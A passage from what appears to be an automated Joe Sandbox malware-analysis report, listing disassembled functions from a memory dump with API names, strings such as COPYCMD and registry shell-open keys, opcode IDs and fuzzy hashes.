                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: c5c3fb5858736f297a356b8c25b4451c12ee5971e0bc84b53954e3dc4a6ccb52
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 41fbdc0f45981392a8be1ae3f0b798cbf48c2336bf4ed7969cfd2cedfd2f237f
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3E91C072608A9B86FB64AF34D8502FDB6A0FB49754FC44136DA4F477A4DEBCD584C220
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D151B0D8 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 320COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: _get_osfhandlememset$wcschr
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: DPATH
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3260997497-2010427443
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 3d336d0508f9d51260e4716dc0b75001e2ca59ffb0876634830191a582af1c3b
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: bcf28f1cb3f5767b5f519dce4c0dba115d8994d52a0624ee9eb1f51d3a518015
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3d336d0508f9d51260e4716dc0b75001e2ca59ffb0876634830191a582af1c3b
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9AD19C22A0864B82FB25AB21D4401BDB2A1FF45B94FD54236D92F473F5DFBCE8858360
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1527FF8 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 87filenativeCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: File$InformationNamePathRelative$CloseDeleteErrorFreeHandleLastName_OpenQueryReleaseStatusStringUnicodeVolumeWith
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: @P
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1801357106-3670739982
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: a098cbb43c680f3415d79602374c39353e633b648bff1f45cd59ed0b1006156a
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 04e687251070fd057d789897da8c695e10b179062e5946102c470488f3198eef
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a098cbb43c680f3415d79602374c39353e633b648bff1f45cd59ed0b1006156a
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A1412E32704A4ADEF710AFA4D4402EDA7A0FB89758FD48272DA1E47AA8DFBCD544C750
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1512220 Relevance: 15.4, APIs: 10, Instructions: 368COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: memset$BufferConsoleInfoScreen
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1034426908-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 64486a4b6b13c1c8e977e62f0f94e25a0603b25ea896dd7b7fc126d69d5cd52d
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 7d06bda58d5936ec44723525529da0c5511e0d0ed3408dbc22683ddf25e37914
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 64486a4b6b13c1c8e977e62f0f94e25a0603b25ea896dd7b7fc126d69d5cd52d
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 32F19E3260878B8AFB65EB21D8402ADB7A0FB45784FD14136DA4F476A5DFBCE584C720
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D153AC4C Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 194registryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: CloseValue$CreateDeleteOpen
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: %s=%s$\Shell\Open\Command
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 4081037667-3301834661
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 95367a666dc1e10ecfff189f591a6456c9e88ca4fe6cad7e4a3eb832a6d246c2
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: c7a980e8a9d840ef75c2bdcaf1d92754139f950a5df5607e67ac53e81c271b84
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 95367a666dc1e10ecfff189f591a6456c9e88ca4fe6cad7e4a3eb832a6d246c2
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6971BF22B09A4B86FB60BB65A0502BEE7A1FF84790FC44532DA4F477A4DFBDD4418720
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D153AA30 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 123registryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        • RegCreateKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7D153AA85
                                                                                                                                                                                                                                                                                                                                                                                                                                        • RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7D153AACF
                                                                                                                                                                                                                                                                                                                                                                                                                                        • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7D153AAEC
                                                                                                                                                                                                                                                                                                                                                                                                                                        • RegDeleteKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF7D15398C0), ref: 00007FF7D153AB39
                                                                                                                                                                                                                                                                                                                                                                                                                                        • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF7D15398C0), ref: 00007FF7D153AB6F
                                                                                                                                                                                                                                                                                                                                                                                                                                        • RegDeleteValueW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF7D15398C0), ref: 00007FF7D153ABA4
                                                                                                                                                                                                                                                                                                                                                                                                                                        • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF7D15398C0), ref: 00007FF7D153ABCB
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: CloseDeleteValue$CreateOpen
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: %s=%s
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1019019434-1087296587
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 72247b027dceff1e1530fc5cf8e528a5709370e20d618e6d58b54cd87f2ef8dd
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 8fb77bad9584ca93ec105d2df31bbd5af209357f67f98025750866cf4ee8d376
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 72247b027dceff1e1530fc5cf8e528a5709370e20d618e6d58b54cd87f2ef8dd
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B5519331B0879B86F760BF25A45076EBA91FB89790FD44236CA4E837A0DFBDD4418710
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1511884 Relevance: 10.9, APIs: 5, Strings: 1, Instructions: 380COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: _wcsnicmpwcsrchr
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: COPYCMD
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 2429825313-3727491224
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 4d82711cc2208d1db92bdbc9a67415b50588ed216ffaf236914d612e0490fdc8
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 79689a8d980af3d613ba90ee032e0f70cd90dcdc68761473a885fd182615e817
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4d82711cc2208d1db92bdbc9a67415b50588ed216ffaf236914d612e0490fdc8
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DAF19362F0865B86FB61AF61D0801BDB6A1AB04798FC14237DE5F136E4DFBCA581C360
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1514A30 Relevance: 10.8, APIs: 7, Instructions: 318COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: memset$FullNamePathwcsrchr
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 4289998964-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: f574b9b165fedc960487e474b398108792cb4fddced71d8a368933aba93db8fb
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: c9ece6f7e8188a989f984681316fe21f62332bd2af67ce3b7f9bcd36dcf999f9
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f574b9b165fedc960487e474b398108792cb4fddced71d8a368933aba93db8fb
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6BC1AD22A0975F82FF95BB52954837DA2A0FF45B90FD15532CA0F077E1EFBCA4918260
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D153BCF0 Relevance: 10.6, APIs: 7, Instructions: 52filenativeCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: ExclusiveLock$AcquireBufferCancelConsoleFileFlushInputReleaseSynchronous_get_osfhandlefflushfprintf
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3476366620-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 6372b5247c68ad753e8b139ca81a5779740cabb9e500d40167355afd769c266a
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 2992879feee893f351c839d8249dc7c2408f4456c59c2a933627875bc34c3bfa
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6372b5247c68ad753e8b139ca81a5779740cabb9e500d40167355afd769c266a
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DD21E920908A4B96FB547B20A8193BCE760EF86715FD4467BD55F422F1DFBCA4048221
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1513D94 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 110nativeCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: InformationProcess$CurrentDirectoryQuery_setjmp_wcsnicmpwcsrchr
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: %9d
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1006866328-2241623522
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 62d65c6c863574456e8a18a26f120651995e0feaf5acd41ec6a68f480e3dc1f6
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 01681a01fe61361d0aad856ab2a527bb2e8c347cf664452ba7c0c66cddef2146
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 62d65c6c863574456e8a18a26f120651995e0feaf5acd41ec6a68f480e3dc1f6
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D9514B72A1874B8AF700AF21D8501ACB7A0FB44764FC14636EA6B537B1CFBCE5458B60
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1518DF8 Relevance: 7.8, APIs: 5, Instructions: 281COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: memset
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 2221118986-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 1a4803f2d100bf75eb873e70d7f896504ce2af50745e4dff0b3b1325a9c43adf
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: c5fe6a983f81e17edadd5f6a6c1e5f9dd3ec1b80908a6aa579cd2c2a11d1cb50
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1a4803f2d100bf75eb873e70d7f896504ce2af50745e4dff0b3b1325a9c43adf
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9FC1C322B0968B86FB65AB11E450ABDB3A0FB55744FC54136DA1F477A0DFBCD5808320
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1519B50 Relevance: 7.8, APIs: 5, Instructions: 252COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
